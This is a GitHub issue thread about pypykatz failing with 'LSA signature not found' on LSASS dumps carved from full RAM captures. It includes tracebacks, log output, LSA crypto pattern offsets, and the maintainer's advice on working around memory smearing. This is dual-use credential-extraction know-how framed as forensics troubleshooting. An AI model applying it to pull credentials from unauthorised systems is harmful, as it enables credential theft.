skelsec/pypykatz

LSA signature not found

Wowhere opened this issue · 4 comments

Wowhere commented

Describe the bug
LSA signature not found. Use volatility3-pypykatz plugin for volatility, but as i see error from pypykatz code. The same error if use pypykatz against exctracted lsass.dmp. Dump is correct, at least i can get hashdump and process handles from dump, using another volatility plugins

Volatility Version: develop, today (10.05.2024)
Operating System: Kali Linux
Python Version: 3.11.7

Steps to reproduce the behavior:

  1. Use command 'python3 vol.py -f ~/testy-tms/silver.raw -l t1 windows.volu_pypykatz.pypykatz'
  2. See error
    Traceback (most recent call last):
    File "/home/andy/2/volatility3/vol.py", line 7, in
    import volatility3.cli
    File "/home/andy/2/volatility3/volatility3/cli/init.py", line 29, in
    from volatility3.cli import text_renderer, volargparse
    File "/home/andy/2/volatility3/volatility3/cli/text_renderer.py", line 22, in
    import capstone
    File "/home/andy/.local/lib/python3.11/site-packages/capstone/init.py", line 380, in
    import pkg_resources
    File "/home/andy/.local/lib/python3.11/site-packages/pkg_resources/init.py", line 3324, in
    @_call_aside
    ^^^^^^^^^^^
    File "/home/andy/.local/lib/python3.11/site-packages/pkg_resources/init.py", line 3299, in _call_aside
    f(*args, **kwargs)
    File "/home/andy/.local/lib/python3.11/site-packages/pkg_resources/init.py", line 3337, in _initialize_master_working_set
    working_set = WorkingSet._build_master()
    ^^^^^^^^^^^^^^^^^^^^^^^^^^
    File "/home/andy/.local/lib/python3.11/site-packages/pkg_resources/init.py", line 622, in _build_master
    ws = cls()
    ^^^^^
    File "/home/andy/.local/lib/python3.11/site-packages/pkg_resources/init.py", line 615, in init
    self.add_entry(entry)
    File "/home/andy/.local/lib/python3.11/site-packages/pkg_resources/init.py", line 671, in add_entry
    for dist in find_distributions(entry, True):
    File "/home/andy/.local/lib/python3.11/site-packages/pkg_resources/init.py", line 2133, in find_on_path
    yield from factory(fullpath)
    File "/home/andy/.local/lib/python3.11/site-packages/pkg_resources/init.py", line 2190, in distributions_from_metadata
    if len(os.listdir(path)) == 0:
    ^^^^^^^^^^^^^^^^
    KeyboardInterrupt
pmehax0r commented

same issue for me as well, here are the error details:
INFO:pypykatz:pypyKatz version: 0.6.8
INFO:pypykatz:CPU arch: X64
INFO:pypykatz:OS: Windows 10
INFO:pypykatz:BuildNumber: 19041
INFO:pypykatz:MajorVersion: 6
INFO:pypykatz:MSV timestamp: 46191720

the error is "LSA Signature not found"

Using a PowerShell tool I managed to extract info about the crypto:
Pattern : 8364243000488D45E0448B4DD8488D15
AES-Offset : 16
IV-Offset : 67
key-struct : Get-BCRYPT_KEY81
DES-Offset : -89
key-handle : Get-BCRYPT_HANDLE_KEY

but for some reason the pattern does not exist in the lsasrv data. the minidump is created by memprocfs

skelsec commented

Dear all,
The problem with parsing lsass which is extracted by memory capture tools is referred to as memory smearing which is a known behavior of all forensics tools. There are no plans to add more heuristics to pypykatz to battle this issue, as this problem is not something worth addressing on a global level.
I can tell you how I solve this problem:

  • take memory snapshot multiple times, there is a good chance you'll get at least one dump which is parsable.
  • modify pypykatz code to suite your needs. by manually identifying key locations, you can edit the code to either look for the smeared values, or add a static offset where you expect the structures to be present.
skelsec commented

The RAM dump was made by "Magnet RAM Forensics", lsass.dmp was extracted from RAM dump by MemProcFS, minidump module for extracted lsass.dmp doesnt show errors minidump_output.txt

The problem is that "show no errors" doesn't mean that the actual data in the regions were captured correctly, it merely tell you that all regions were accounted for and the minidump file could be reconstructed. Sometimes even that is not correct, especially with "Magnet dump" which is the usual suspect of causing some issues.

pmehax0r commented

Thank you for the info Skelsec! The memory dump I've collected has been created using Dumpit. Funny enough it works really well with some Windows builds but fails with others. I will try to play with the structures and see if I can identify something. On the specific machine that it failed creating multiple dumps did not help (so far) unfortunately, so I will try to work with pypykatz and try to modify it a bit.
Thank you for your amazing work with pypykatz!